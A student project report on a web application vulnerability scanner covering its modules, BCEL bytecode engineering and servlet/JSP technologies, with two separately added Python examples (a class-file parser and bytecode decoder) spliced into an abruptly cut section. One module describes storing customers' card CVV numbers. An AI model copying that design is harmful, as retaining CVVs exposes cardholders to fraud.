web application scanner
8/9/2019 Web Application Scanner
1/73
WEB APPLICATION SCANNER
A PROJECT REPORT
Submitted by
OMAR FAROOQ.M (22506205304)
TAMJEED AHMED.J (22506205057)
in partial fulfillment for the award of the degree
of
BACHELOR OF TECHNOLOGY
in
INFORMATION TECHNOLOGY
LOYOLA INSTITUTE OF TECHNOLOGY, CHENNAI
ANNA UNIVERSITY:: CHENNAI 600 025
APRIL 2010
ANNA UNIVERSITY : CHENNAI 600 025
BONAFIDE CERTIFICATE
Certified that this project report WEB APPLICATION SCANNER is the
bonafide work of OMAR FAROOQ.M (22506205304) and TAMJEED AHMED.J
(22506205057), who carried out the project work under my supervision.
SIGNATURE
Mr. S. Suresh, M.S.
Head of the Department
Information Technology,
Loyola Institute Of Technology,
Palanchur, Chennai - 602 103.
SIGNATURE
Mr. P. Satish Kumar, M.E.
Lecturer
Dept of Computer Science and Engineering,
Loyola Institute Of Technology,
Palanchur, Chennai - 602 103.
Submitted for University Examination held on .04.10
INTERNAL EXAMINER EXTERNAL EXAMINER
ACKNOWLEDGEMENT
With deep sense of gratitude, we wish to acknowledge the support and help
extended by all the many people for the successful accomplishment of this work.
First of all, we thank the almighty for giving us the courage to complete this
project.
We owe a special debt of gratitude to Rev. Fr. Dr. ARUL RAJ OMI, our
chairman, Rev. Sr. JEHANI DMI, our secretary, and Sr. SANDHYA DMI, our
administrator, for giving motivation in all aspects.
We express our sincere thanks to our respected director and our beloved
principal Dr.N.K.BALUCHAMY, Ph.D., for providing us with adequate
infrastructure and a congenial academic environment.
We express our gratitude to the Head of the Department of Information Technology,
MR.S.SURESH, M.S., whose guidance and encouragement have helped us in
completing this project work. We extend our sincere thanks to our project
coordinator and internal guide, Mr.P.SATISH KUMAR, M.E., for giving us the
confidence to complete the project successfully by providing valuable
suggestions and interest at every stage of the project.
We would be failing in our duty if we don't mention the wholehearted
support and technical assistance extended to us by the staff members and lab assistants
of our department.
TABLE OF CONTENTS
CHAPTER NO TITLE PAGE NO
ABSTRACT VI
LIST OF FIGURES VII
LIST OF SYMBOLS/ABBREVIATIONS VIII
1 INTRODUCTION 1
1.1 PROJECT OVERVIEW 1
1.2 EXISTING SYSTEM 1
1.3 PROPOSED SYSTEM 2
2 PROJECT DESCRIPTION 4
2.1 LITERATURE REVIEW 4
2.2 MODULE DESCRIPTION 5
2.2.1 USER MANAGEMENT 5
2.2.2 CLIENT ACCOUNT LEVEL DATA 5
2.2.3 SERVICE LEVEL DATA 6
2.2.4 GATHERING DATA FROM APPLICATION 6
2.2.5 SCANNING APPLICATION 6
2.2.6 TRACKING ATTACK 7
2.2.7 MAINTAIN LOGS AND REPORTS 7
2.3 METHODOLOGY 7
2.3.1 BYTE CODE ENGINEERING 7
2.3.2 JAVA CLASS FILE FORMAT 9
2.3.3 BYTE CODE INSTRUCTION SET 10
2.3.4 THE BCEL-API 12
3 SYSTEM REQUIREMENT 15
3.1 REQUIREMENTS SPECIFICATION 15
3.1.1 HARDWARE REQUIREMENT 15
3.1.2 SOFTWARE REQUIREMENT 15
3.2 TECHNOLOGIES 15
3.2.1 SERVLETS 16
3.2.2 JSP 18
3.2.3 JAVASCRIPT 20
4 SYSTEM DESIGN 21
4.1 ARCHITECTURAL DESIGN 21
4.1.1 ARCHITECTURAL STYLES 22
4.2 DATA FLOW MODEL 24
4.2.1 LEVEL 0 DFD 24
4.2.2 LEVEL 1 DFD 24
4.2.3 LEVEL 2 DFD 25
4.3 INTERFACE DESIGN 25
5 ATTACKS 27
5.1 SQL INJECTION 27
5.2 CROSS SITE SCRIPTING 30
6 TESTING 35
6.1 VALIDATION TESTING 35
6.2 OUTPUT TESTING 36
6.2.1 DEVIATION 36
6.3 SYSTEM TESTING 36
6.4 ACCEPTANCE TESTING 37
7 SCREENSHOTS 38
8 CONCLUSION 49
8.1 FUTURE ENHANCEMENTS 49
APPENDICES 50
REFERENCE 63
ABSTRACT
Software assurance tools are a fundamental resource for providing an
assurance argument for today's software applications throughout the software
development lifecycle (SDLC). Software requirements, design models, source
code, and executable code are analyzed by tools in order to determine if an
application is secure. This project constitutes a specification for a particular type of
software assurance tool, which is referred to here as a web application security
scanner. A web application security scanner is an automated program that
examines web applications for potential security vulnerabilities. In addition to
searching for web application-specific vulnerabilities, this tool also looks for
software coding errors and maintains a log.
This tool can detect vulnerabilities of the finalized release candidate before
shipping. It simulates a malicious user by attacking and probing, and observing which
results fall outside the expected result set. As a dynamic testing tool, it is not
language dependent. A web application scanner is able to scan JAVA/JSP, PHP or
any other engine-driven web application.
LIST OF FIGURES
FIG.NO TITLE PAGE NO
2.3.2 Java class file format 10
4.1 Architectural diagram of WEB APPLICATION SCANNER 23
4.2.1 Level 0 DFD 24
4.2.2 Level 1 DFD 24
4.2.3 Level 2 DFD 25
5.2 CROSS-SITE SCRIPTING 33
LIST OF SYMBOLS/ABBREVIATIONS
J2EE: Java 2 Enterprise Edition is a programming platform, part of the
Java Platform, for developing and running distributed multitier architecture
Java applications, based largely on modular software components running
on an application server.
CSS: Cascading Style Sheets, used for designing the HTML content.
HTML: Hypertext Markup Language is a markup language used to design static web pages.
HTTP: Hypertext Transfer Protocol is a transaction-oriented client/server protocol between a web browser and a web server.
HTTPS: Secure Hypertext Transfer Protocol is HTTP over SSL (Secure Sockets Layer).
TCP/IP: Transmission Control Protocol/Internet Protocol, the suite of
communication protocols used to connect hosts on the Internet. TCP/IP uses
several protocols, the two main ones being TCP and IP.
DHTMLX: DHTMLX is a JavaScript library which unites numerous products
for the creation of rich UIs for web applications. The whole interface and
browser-side work of the application can be built merely by using DHTMLX
components; alternatively, an application can be built in any other way and
use DHTMLX components only for specific functionality.
FusionCharts: Helps you create animated and interactive Flash charts for
web and desktop applications. It livens up your applications by converting
monotonous data into exciting visuals.
CHAPTER 1
INTRODUCTION
1.1 PROJECT OVERVIEW
As organizations have grown increasingly dependent on online software, the
risk of malicious attacks has also become far more serious. Such attacks can bring
a business to a standstill, cost a company millions of dollars in lost transactions and
potentially tarnish its brand image.
Fortunately, well-governed organizations can protect their Web applications
by injecting vulnerability assessments and ethical hacks into their software
development and delivery processes. By using automated tools to perform these checks
throughout the online application lifecycle, auditors, developers and quality
assurance (QA) professionals can help foil hackers and reduce their company's
exposure to potential business losses.
This application describes the most common hacker attacks and provides
basic rules that can help to create more hack-resistant Web applications.
1.2 EXISTING SYSTEM
Currently, white-box testing is used, which has not experienced widespread
use for finding security flaws in web applications.
- It tests only the structure of the code.
- It relies on a database of known bugs.
- It is not automated.
- It has limited detection capabilities.
- When the coding complexity increases, this type of scanning tool fails to detect the
attacks.
1.3 PROPOSED SYSTEM
In practice, black-box vulnerability scanners are used to discover security
problems in web applications.
- To increase confidence in the correctness of our scan results, our tool
also attempts to automatically generate proof-of-concept exploits in certain
cases.
- There is a need for a scanner that covers a broad range of general classes
of vulnerabilities, without specific knowledge of bugs in particular versions
of web applications.
- The web application scanner uses a black-box approach to crawl and scan web
sites for the presence of exploitable SQL injection and XSS vulnerabilities.
- Our system does not rely on a database of known bugs. Instead, the
distinctive, underlying properties of application-level vulnerabilities are
exploited to detect affected programs.
- The web application scanner has a flexible architecture that consists of
multithreaded crawling, attack, and analysis components.
- With the help of a graphical user interface, the user can configure single or
combined crawling and attack runs.
- These tools operate by launching attacks against an application and
observing its response to these attacks.
- These tools are valuable components when auditing the security of a web
site; they largely lack the ability to identify a priori unknown instances of
vulnerabilities.
SCOPE:
i. Customer registration and profile management
ii. Static information about most common risks and vulnerabilities.
iii. Users can see their historical scan data and reports.
iv. Secure access to confidential data (user details); SSL is used.
CHAPTER 2
PROJECT DESCRIPTION
2.1 LITERATURE REVIEW
Currently, white-box testing is used, which has not experienced widespread
use for finding security flaws in web applications. An important reason is the
limited detection capability of white-box analysis tools, in particular due to
heterogeneous programming environments and the complexity of applications that
incorporate database, business logic, and user interface components.
In practice, black-box vulnerability scanners are used to discover security
problems in web applications. These tools operate by launching attacks against an
application and observing its response to these attacks. These tools are valuable
components when auditing the security of a web site; they largely lack the ability
to identify a priori unknown instances of vulnerabilities.
There is a need for a scanner that covers a broad range of general classes
of vulnerabilities, without specific knowledge of bugs in particular versions of web
applications. The web application scanner uses a black-box approach to crawl and scan
web sites for the presence of exploitable SQL injection and XSS vulnerabilities.
Our system does not rely on a database of known bugs. Instead, the distinctive,
underlying properties of application-level vulnerabilities are exploited to detect
affected programs. To increase confidence in the correctness of our scan
results, our tool also attempts to automatically generate proof-of-concept exploits
in certain cases. The web application scanner has a flexible architecture that consists of
multithreaded crawling, attack, and analysis components. With the help of a
graphical user interface, the user can configure single or combined crawling and
attack runs.
2.2 MODULE DESCRIPTION
The word implementation means changing from the old system to the new system, that is,
adopting new features. Each successive version can incorporate the capabilities of the
previous version and provide additional processing functions. System
implementation specifies the functional and performance tests that must be
performed and the standards to be applied to the source code, internal documentation
and external documentation such as the design specification, the test plan, the
user's manual, the principles of operation, and the installation and maintenance
procedures. The desired functional and physical audits of source code, documents,
and physical media are specified.
2.2.1 USER MANAGEMENT
In this module, we manage the users, i.e., only authorized users
are allowed to use our tool. Users are authenticated based on credentials
such as user name and password. If they do not provide the correct user name and
password they are not allowed to use our tool. If the user is new to our
application, they are provided with a username and password after
registration. A forgotten-password recovery facility is also available in this
module.
2.2.2 CLIENT ACCOUNT LEVEL DATA
In this module, we maintain the clients' information and client
account level data. The admin maintains the clients' account level data. Account
number and credit card information such as CVV number, bank, and card type will be
maintained in this module. These details will be provided by the users at the time
of registration.
2.2.3 SERVICE LEVEL DATA
In this module, the privileges for three types of users are maintained. The
restrictions for the users are maintained by the admin at this level. Only paid
users are allowed to upload files and scan; other users are not allowed to use
our application.
Privilege levels for users to access the Scanner tool:
i. Silver Customer (free user)
ii. Gold Customer (independent developers)
iii. Platinum Customer (corporate customers)
2.2.4 GATHERING DATA FROM APPLICATION
When the user gives an application to scan, we have to gather information
about that application. That process is carried out in this module. We have to
gather sufficient data from the application.
2.2.5 SCANNING APPLICATION
In this module the application given by the user is scanned. The user
has to upload the executable file; after uploading the executable file, our
application automatically scans it. Both the request and the response
are scanned in this process.
2.2.6 TRACKING ATTACK
In this module, the user's application is tracked to determine how secure the
application is. There are 12 types of hacking; the application should not allow those
attacks. Those attacks are tracked in this module.
2.2.7 MAINTAIN LOGS AND REPORTS
In this module, logs are maintained. If there is any attack on the user's
application, it is tracked in the above modules and the results are
maintained as a log file that is given to the user.
2.3 METHODOLOGY
2.3.1 BYTECODE ENGINEERING
Extensions and improvements of the programming language Java and its
related execution environment (Java Virtual Machine, JVM) are the subject of a
large number of research projects and proposals. There are projects, for instance, to
add parameterized types to Java, to implement Aspect-Oriented Programming, to
perform sophisticated static analysis, and to improve the run-time performance.
Since Java classes are compiled into portable binary class files (called byte
code), it is the most convenient and platform-independent way to implement these
improvements not by writing a new compiler or changing the JVM, but by
transforming the byte code. These transformations can either be performed after
compile-time, or at load-time. Many programmers are doing this by implementing
their own specialized byte code manipulation tools, which are, however, restricted
in the range of their re-usability.
To deal with the necessary class file transformations, we introduce an API
that helps developers to conveniently implement their transformations.
The Java language has become very popular and many research projects deal
with further improvements of the language or its run-time behavior. The possibility
to extend a language with new concepts is surely a desirable feature, but
implementation issues should be hidden from the user. Fortunately, the concepts of
the Java Virtual Machine permit the user-transparent implementation of such
extensions with relatively little effort.
Because the target language of Java is an interpreted language with a small
and easy-to-understand set of instructions (the byte code), developers can
implement and test their concepts in a very elegant way. One can write a plug-in
replacement for the system's class loader, which is responsible for dynamically
loading class files at run-time and passing the byte code to the Virtual Machine.
Class loaders may thus be used to intercept the loading process and transform
classes before they actually get executed by the JVM [LB98]. While the original
class files always remain unaltered, the behavior of the class loader may be
reconfigured for every execution or instrumented dynamically.
The BCEL API (Byte Code Engineering Library), formerly known as
JavaClass, is a toolkit for the static analysis and dynamic creation or
transformation of Java class files. It enables developers to implement the desired
features on a high level of abstraction without handling all the internal details of
the Java class file format and thus re-inventing the wheel every time. BCEL is
written entirely in Java and freely available under the terms of the GNU Library
Public License (LGPL).
2.3.2 JAVA CLASS FILE FORMAT
Giving a full overview of the design issues of the Java class file format and
the associated byte code instructions is beyond the scope of this report. We will
Fig 2.3.2 Java Class File Format
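As an added illustration of the class file layout sketched in the figure (example code written for this section, not part of the project and not BCEL), the following standalone Python parser reads the magic number, version, constant pool and class-level indexes of a hand-assembled minimal class. It also shows the constant pool property discussed in the BCEL section below: entries are addressed by integer index, slot 0 is reserved, and 8-byte constants occupy two slots.

```python
"""Minimal Java class file parser: header, constant pool and class-level indexes.

Added example; it is not part of the project report and does not use BCEL.
Layout follows the ClassFile structure of the JVM specification.
"""
import struct

# Constant pool tags from the JVM specification. A parser must know every tag
# because the size of each entry depends on it; an unknown tag means the pool
# cannot be walked any further.
CONSTANT_Utf8, CONSTANT_Integer, CONSTANT_Float = 1, 3, 4
CONSTANT_Long, CONSTANT_Double, CONSTANT_Class = 5, 6, 7
CONSTANT_String, CONSTANT_Fieldref, CONSTANT_Methodref = 8, 9, 10
CONSTANT_InterfaceMethodref, CONSTANT_NameAndType = 11, 12

# Fixed-size entries: tag -> (struct format, field names)
_FIXED = {
    CONSTANT_Integer: (">i", ("value",)),
    CONSTANT_Float: (">f", ("value",)),
    CONSTANT_Long: (">q", ("value",)),
    CONSTANT_Double: (">d", ("value",)),
    CONSTANT_Class: (">H", ("name_index",)),
    CONSTANT_String: (">H", ("string_index",)),
    CONSTANT_Fieldref: (">HH", ("class_index", "name_and_type_index")),
    CONSTANT_Methodref: (">HH", ("class_index", "name_and_type_index")),
    CONSTANT_InterfaceMethodref: (">HH", ("class_index", "name_and_type_index")),
    CONSTANT_NameAndType: (">HH", ("name_index", "descriptor_index")),
}


class ClassFileError(ValueError):
    """Raised for any structural problem; callers never get a half-parsed result."""


def _read(fmt, data, pos):
    """Unpack fmt at pos, refusing to read past the end of the buffer."""
    size = struct.calcsize(fmt)
    if pos + size > len(data):
        raise ClassFileError("truncated class file at offset %d" % pos)
    return struct.unpack_from(fmt, data, pos), pos + size


def parse_class_file(data: bytes) -> dict:
    """Parse magic, version, constant pool, access flags and this/super class.

    The constant pool is returned as a list indexed from 1 (slot 0 is reserved
    and never referenced), exactly as the class file numbers it.
    """
    (magic, minor, major, cp_count), pos = _read(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ClassFileError("bad magic 0x%08x" % magic)
    pool = [None]
    index = 1
    while index < cp_count:
        (tag,), pos = _read(">B", data, pos)
        if tag == CONSTANT_Utf8:
            (length,), pos = _read(">H", data, pos)
            if pos + length > len(data):
                raise ClassFileError("truncated Utf8 entry at index %d" % index)
            # The class file stores modified UTF-8; plain decoding suffices for ASCII names.
            pool.append({"tag": tag, "bytes": data[pos:pos + length].decode("utf-8", "replace")})
            pos += length
        elif tag in _FIXED:
            fmt, names = _FIXED[tag]
            values, pos = _read(fmt, data, pos)
            entry = {"tag": tag}
            entry.update(zip(names, values))
            pool.append(entry)
            if tag in (CONSTANT_Long, CONSTANT_Double):
                pool.append(None)  # 8-byte constants occupy two pool slots
                index += 1
        else:
            raise ClassFileError("unknown constant pool tag %d at index %d" % (tag, index))
        index += 1
    (access_flags, this_class, super_class), pos = _read(">HHH", data, pos)
    return {
        "version": (major, minor),
        "constant_pool": pool,
        "access_flags": access_flags,
        "this_class": class_name(pool, this_class),
        "super_class": class_name(pool, super_class) if super_class else None,
    }


def class_name(pool, index):
    """Follow a CONSTANT_Class index to its Utf8 name, validating both hops."""
    entry = pool[index] if 0 < index < len(pool) else None
    if entry is None or entry["tag"] != CONSTANT_Class:
        raise ClassFileError("index %d is not a CONSTANT_Class" % index)
    name = pool[entry["name_index"]] if 0 < entry["name_index"] < len(pool) else None
    if name is None or name["tag"] != CONSTANT_Utf8:
        raise ClassFileError("name_index %d is not a CONSTANT_Utf8" % entry["name_index"])
    return name["bytes"]


def is_well_formed(data: bytes) -> bool:
    """True when the header and constant pool parse cleanly."""
    try:
        parse_class_file(data)
        return True
    except ClassFileError:
        return False


def build_sample_class() -> bytes:
    """Hand-assembled minimal class `Hello extends java/lang/Object` (constructed sample)."""
    name = b"java/lang/Object"
    pool = (struct.pack(">BH", CONSTANT_Class, 2)                     # 1: Class -> #2
            + struct.pack(">BH", CONSTANT_Utf8, 5) + b"Hello"          # 2: Utf8 "Hello"
            + struct.pack(">BH", CONSTANT_Class, 4)                    # 3: Class -> #4
            + struct.pack(">BH", CONSTANT_Utf8, len(name)) + name)     # 4: Utf8
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 49, 5)  # magic, minor, major, cp_count
    # access_flags (ACC_PUBLIC|ACC_SUPER), this_class, super_class, then zero
    # interfaces, fields, methods and attributes.
    return header + pool + struct.pack(">HHHHHHH", 0x0021, 1, 3, 0, 0, 0, 0)
```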
2.3.3 BYTE-CODE INSTRUCTION SET
The JVM is a stack-oriented interpreter that creates a local stack frame of
fixed size for every method invocation. The size of the local stack has to be
computed by the compiler. Values may also be stored intermediately in a frame
area containing local variables, which can be used like a set of registers. These local
variables are numbered from 0 to 65535, i.e. you have a maximum of 65536 local
variables. The stack frames of caller and callee method are overlapping, i.e.
the caller pushes arguments onto the operand stack and the called method receives
them in local variables.
The byte code instruction set currently consists of 212 instructions; 44
opcodes are marked as reserved and may be used for future extensions or
intermediate optimizations within the Virtual Machine. The instruction set can be
roughly grouped as follows:
Stack operations: Constants can be pushed onto the stack either by loading them
from the constant pool with the ldc instruction or with special short-cut
instructions where the operand is encoded into the instruction, e.g. iconst_0 or
bipush (push byte value).
Arithmetic operations: The instruction set of the Java Virtual Machine
distinguishes its operand types using different instructions to operate on values of
a specific type. Arithmetic operations starting with i, for example, denote an integer
operation.
Control flow: There are branch instructions like goto and if_icmpeq, which
compares two integers for equality. There is also a jsr (jump sub-routine) and ret
pair of instructions that is used to implement the finally clause of try-catch blocks.
Exceptions may be thrown with the athrow instruction. Branch targets are coded as
offsets from the current byte code position, i.e. with an integer number.
Load and store operations: for local variables like iload and istore. There are also
array operations like iastore which stores an integer value into an array.
Field access: The value of an instance field may be retrieved with getfield and
written with putfield. For static fields, there are getstatic and putstatic counterparts.
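The grouping above, as an added example (written for this section; not from the report or BCEL): a small Python decoder for a subset of these opcodes that resolves the relative branch offsets of goto and if_icmpeq to absolute targets and rejects a branch that does not land on an instruction boundary, which is one of the checks the JVM verifier performs before executing a method. The sample method body is hand-assembled, not emitted by javac.

```python
"""Tiny JVM bytecode decoder for a subset of the instruction set.

Added example; not part of the project report and not BCEL. Opcode numbers
and operand sizes follow the JVM specification.
"""
import struct

# Operand encodings: "s1"/"s2" signed immediate, "u1" local or cp index,
# "cp2" 2-byte constant pool index, "br2" 2-byte signed branch offset.
OPCODES = {
    0x00: ("nop", ()), 0x01: ("aconst_null", ()),
    0x02: ("iconst_m1", ()), 0x03: ("iconst_0", ()), 0x04: ("iconst_1", ()),
    0x05: ("iconst_2", ()), 0x06: ("iconst_3", ()), 0x07: ("iconst_4", ()),
    0x08: ("iconst_5", ()),
    0x10: ("bipush", ("s1",)), 0x11: ("sipush", ("s2",)), 0x12: ("ldc", ("u1",)),
    0x15: ("iload", ("u1",)), 0x1a: ("iload_0", ()), 0x1b: ("iload_1", ()),
    0x1c: ("iload_2", ()), 0x1d: ("iload_3", ()),
    0x36: ("istore", ("u1",)), 0x3b: ("istore_0", ()), 0x3c: ("istore_1", ()),
    0x3d: ("istore_2", ()), 0x3e: ("istore_3", ()), 0x4f: ("iastore", ()),
    0x60: ("iadd", ()), 0x64: ("isub", ()), 0x68: ("imul", ()), 0x6c: ("idiv", ()),
    0x84: ("iinc", ("u1", "s1")),
    0x99: ("ifeq", ("br2",)), 0x9a: ("ifne", ("br2",)),
    0x9f: ("if_icmpeq", ("br2",)), 0xa0: ("if_icmpne", ("br2",)),
    0xa7: ("goto", ("br2",)), 0xa8: ("jsr", ("br2",)), 0xa9: ("ret", ("u1",)),
    0xac: ("ireturn", ()), 0xb1: ("return", ()),
    0xb2: ("getstatic", ("cp2",)), 0xb3: ("putstatic", ("cp2",)),
    0xb4: ("getfield", ("cp2",)), 0xb5: ("putfield", ("cp2",)),
    0xbf: ("athrow", ()),
}
_FMT = {"s1": ">b", "s2": ">h", "u1": ">B", "cp2": ">H", "br2": ">h"}


class BytecodeError(ValueError):
    """Unknown opcode, truncated operand, or a branch into the middle of an instruction."""


def decode(code: bytes):
    """Decode a method's code array into (offset, mnemonic, operands, target) tuples.

    target is the absolute branch target for br2 instructions, else None.
    Offsets are relative to the branch opcode itself, as the section above states.
    """
    insns = []
    pos = 0
    while pos < len(code):
        op = code[pos]
        if op not in OPCODES:
            raise BytecodeError("unsupported or reserved opcode 0x%02x at %d" % (op, pos))
        name, kinds = OPCODES[op]
        operands = []
        cur = pos + 1
        target = None
        for kind in kinds:
            fmt = _FMT[kind]
            size = struct.calcsize(fmt)
            if cur + size > len(code):
                raise BytecodeError("truncated operand for %s at %d" % (name, pos))
            (value,) = struct.unpack_from(fmt, code, cur)
            cur += size
            operands.append(value)
            if kind == "br2":
                target = pos + value
        insns.append((pos, name, tuple(operands), target))
        pos = cur
    # Verifier-style check: every branch must land on an instruction start.
    starts = {insn[0] for insn in insns}
    for off, name, _, target in insns:
        if target is not None and target not in starts:
            raise BytecodeError("%s at %d branches to %d, not an instruction start" % (name, off, target))
    return insns


def is_verifiable(code: bytes) -> bool:
    """True when the code decodes cleanly and all branches are well-targeted."""
    try:
        decode(code)
        return True
    except BytecodeError:
        return False


def disassemble(code: bytes) -> str:
    """Render the decoded instructions in a javap-like listing."""
    lines = []
    for off, name, operands, target in decode(code):
        text = "%4d: %s" % (off, name)
        if operands:
            text += " " + ", ".join(str(o) for o in operands)
        if target is not None:
            text += "  -> %d" % target
        lines.append(text)
    return "\n".join(lines)


# Constructed sample: `int i = 0; while (i != 10) i++; return i;` assembled by hand.
SAMPLE_LOOP = bytes([
    0x03,              #  0: iconst_0
    0x3c,              #  1: istore_1
    0x1b,              #  2: iload_1
    0x10, 0x0a,        #  3: bipush 10
    0x9f, 0x00, 0x09,  #  5: if_icmpeq +9  -> 14 (exit loop)
    0x84, 0x01, 0x01,  #  8: iinc 1, 1
    0xa7, 0xff, 0xf7,  # 11: goto -9      -> 2  (loop head)
    0x1b,              # 14: iload_1
    0xac,              # 15: ireturn
])
```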
1. A package that contains classes that describe static constraints of class
files, i.e., reflect the class file format, and is not intended for byte code
modifications. The classes may be used to read and write class files from
or to a file. This is useful especially for analyzing Java classes without
having the source files at hand. The main data structure is called
JavaClass, which contains methods, fields, etc.
2. A package to dynamically generate or modify JavaClass objects. It may
be used e.g. to insert analysis code, to strip unnecessary information from
class files, or to implement the code generator back-end of a Java
compiler.
3. Various code examples and utilities like a class file viewer, a tool to
convert class files into HTML, and a converter from class files to the
Jasmin assembly language [MD97].
In this report we presented the BCEL API that is intended to be a general
purpose tool for byte code engineering. It helps developers to implement analysis
tools or byte code transformations conveniently. It has proved to be useful in
several projects and is not restricted to a special kind of application area. We found
two issues of the API that may be considered as drawbacks: The generic constant
pool is an add-only data structure, i.e. constant pool entries can be added and
retrieved but not removed directly.
They are referenced via integer indexes and not some kind of virtual handle.
We think that the removal of entries from the constant pool is rarely an issue and
that implementing the access to it via handles would cause too much overhead.
One would rather write a supplementary tool to strip unnecessary entries from
classes. The second issue may be not to encapsulate instructions into instruction
handles anymore but to put the necessary code directly into the instructions. Yet
we feel that this would not give us such a clear and elegant level of abstraction as it
does now and we could not share instruction objects.
CHAPTER 3
SYSTEM REQUIREMENT
3.1 REQUIREMENT SPECIFICATION
3.1.1 HARDWARE REQUIREMENT
Pentium IV at 3 GHz
RAM: 1 GB
Disk Space: 160 GB
3.1.2 SOFTWARE REQUIREMENT
Client on Internet: Web Browser, Operating System (any)
Web Server: Apache Tomcat 6.0, Operating System (any)
Data Base Server: MySQL 6.0, Operating System (any)
Development End: J2EE, Java, Java Bean, Servlets, HTML, CSS, Javascript, XML, MySQL, OS (Windows), Apache Tomcat
3.2 TECHNOLOGIES
J2EE, JSP, SERVLETS: Application Architecture
MYSQL: Database
ECLIPSE: Development Tool
APACHE TOMCAT: Web Server
3.2.1 SERVLETS
INTRODUCTION:
Servlets are the Java platform technology of choice for extending and
enhancing Web servers. Servlets provide a component-based, platform-independent
method for building Web-based applications, without the performance
limitations of CGI programs. And unlike proprietary server extension mechanisms
(such as the Netscape Server API or Apache modules), servlets are server- and
platform-independent. This leaves you free to select a "best of breed" strategy for
your servers, platforms, and tools.
Servlets have access to the entire family of Java APIs, including the JDBC
API to access enterprise databases. Servlets can also access a library of HTTP-
specific calls and receive all the benefits of the mature Java language, including
portability, performance, reusability, and crash protection.
Today servlets are a popular choice for building interactive Web
applications. Third-party servlet containers are available for Apache Web Server,
Microsoft IIS, and others. Servlet containers are usually a component of Web and
application servers, such as BEA WebLogic Application Server, IBM WebSphere,
Sun Java System Web Server, Sun Java System Application Server, and others.
Servlets are Java technology's answer to CGI programming. Building Web
pages on the fly is useful (and commonly done) for a number of reasons:
- The Web page is based on data submitted by the user. For example, the
results pages from search engines are generated this way, and programs that
process orders for e-commerce sites do this as well.
- The data changes frequently. For example, a weather-report or news
headlines page might build the page dynamically, perhaps returning a
previously built page if it is still up to date.
- The Web page uses information from corporate databases or other such
sources. For example, you would use this for making a Web page at an on-line
store that lists current prices and number of items in stock.
ADVANTAGES OVER CGI TECHNOLOGIES:
Java servlets are more efficient, easier to use, more powerful, more portable,
and cheaper than traditional CGI and than many alternative CGI-like technologies.
(More importantly, servlet developers get paid more than Perl programmers :-).
Efficient: With traditional CGI, a new process is started for each HTTP
request. If the CGI program does a relatively fast operation, the overhead of
starting the process can dominate the execution time. With servlets, the Java
Virtual Machine stays up, and each request is handled by a lightweight Java
thread, not a heavyweight operating system process. Similarly, in traditional
CGI, if there are N simultaneous requests to the same CGI program, then the
code for the CGI program is loaded into memory N times. With servlets,
however, there are N threads but only a single copy of the servlet class.
Servlets also have more alternatives than do regular CGI programs for
optimizations such as caching previous computations, keeping database
connections open, and the like.
Convenient: Besides the convenience of being able to use a familiar
language, servlets have an extensive infrastructure for automatically parsing
and decoding HTML form data, reading and setting HTTP headers, handling
cookies, tracking sessions, and many other such utilities.
Powerful: Java servlets let you easily do several things that are difficult or
impossible with regular CGI. For one thing, servlets can talk directly to the
Web server (regular CGI programs can't). This simplifies operations that
need to look up images and other data stored in standard places. Servlets can
also share data among each other, making useful things like database
connection pools easy to implement. They can also maintain information
from request to request, simplifying things like session tracking and caching
of previous computations.
Portable: Servlets are written in Java and follow a well-standardized API.
Consequently, servlets written for, say, I-Planet Enterprise Server can run
virtually unchanged on Apache, Microsoft IIS, or WebStar. Servlets are
supported directly or via a plug-in on almost every major Web server.
Inexpensive: There are a number of free or very inexpensive Web servers
available that are good for "personal" use or low-volume Web sites.
However, with the major exception of Apache, which is free, most
commercial-quality Web servers are relatively expensive. Nevertheless, once
you have a Web server, no matter the cost of that server, adding servlet
support to it (if it doesn't come preconfigured to support servlets) is
generally free or cheap.
3.2.2 JAVA SERVER PAGES
Java Server Pages (JSP) technology enables Web developers and designers
to rapidly develop and easily maintain, information-rich, dynamic Web pages that
leverage existing business systems. As part of the Java technology family, JSP
technology enables rapid development of Web-based applications that are platform
independent. JSP technology separates the user interface from content generation,
enabling designers to change the overall page layout without altering the
underlying dynamic content.
ADVANTAGES OF JSP:
vs. Active Server Pages (ASP): ASP is a similar technology from Microsoft.
The advantages of JSP are twofold. First, the dynamic part is written in Java,
not Visual Basic or other MS-specific language, so it is more powerful and
easier to use. Second, it is portable to other operating systems and non-Microsoft Web servers.
vs. Pure Servlets: JSP doesn't give you anything that you couldn't in
principle do with a servlet. But it is more convenient to write (and to
modify!) regular HTML than to have a zillion println statements that
generate the HTML. Plus, by separating the look from the content you can
put different people on different tasks: your Web page design experts can
build the HTML, leaving places for your servlet programmers to insert the
dynamic content.
vs. Server-Side Includes (SSI): SSI is a widely-supported technology for
including externally-defined pieces into a static Web page. JSP is better
because it lets you use servlets instead of a separate program to generate that
dynamic part. Besides, SSI is really only intended for simple inclusions, not
for "real" programs that use form data, make database connections, and the
like.
vs. JavaScript: JavaScript can generate HTML dynamically on the client.
This is a useful capability, but only handles situations where the dynamic
information is based on the client's environment. With the exception of
cookies, HTTP and form submission data is not available to JavaScript. And,
since it runs on the client, JavaScript can't access server-side resources like
databases, catalogs, pricing information, and the like.
vs. Static HTML: Regular HTML, of course, cannot contain dynamic
information. JSP is so easy and convenient that it is quite feasible to
augment HTML pages that only benefit marginally by the insertion of small
amounts of dynamic data. Previously, the cost of using dynamic data would
preclude its use in all but the most valuable instances.
3.2.3 JAVASCRIPT
JavaScript is a cross-platform, object-oriented scripting language. JavaScript
is a small, lightweight language; it is not useful as a standalone language, but is
designed for easy embedding in other products and applications, such as web
browsers. Inside a host environment, JavaScript can be connected to the objects of
its environment to provide programmatic control over them.
CHAPTER 4
SYSTEM DESIGN
Object-Oriented Design (OOD) converts the analysis model into a design
model that serves as a blueprint for software construction. The objects in an
object-oriented design are related to the solution of the problem that is being
solved. There may be close relationships between some problem objects and some
solution objects, but the designer inevitably has to add new objects to
implement the solution.
OOD can yield the following benefits:
- Maintainability through simplified mapping to the problem domain,
which provides for less analysis effort, less complexity in system design,
and easier verification by the user.
- Reusability of the design artifacts, which saves time and costs, and
productivity gains through direct mapping to features of Object-Oriented
Programming Languages.
4.1 ARCHITECTURAL DESIGN
Architectural design is the high level design where the whole system is divided
into different subsystems and the dependency relationship and communication
between them are also identified. A good architectural design shows the
dependencies and the primary communication mechanisms
between the various packages.
4.1.1 ARCHITECTURAL STYLES
A builder uses an architectural style as a descriptive mechanism to
differentiate a house from other styles (e.g., A-frame, raised ranch, Cape Cod).
But more importantly, the architectural style is also a pattern for construction.
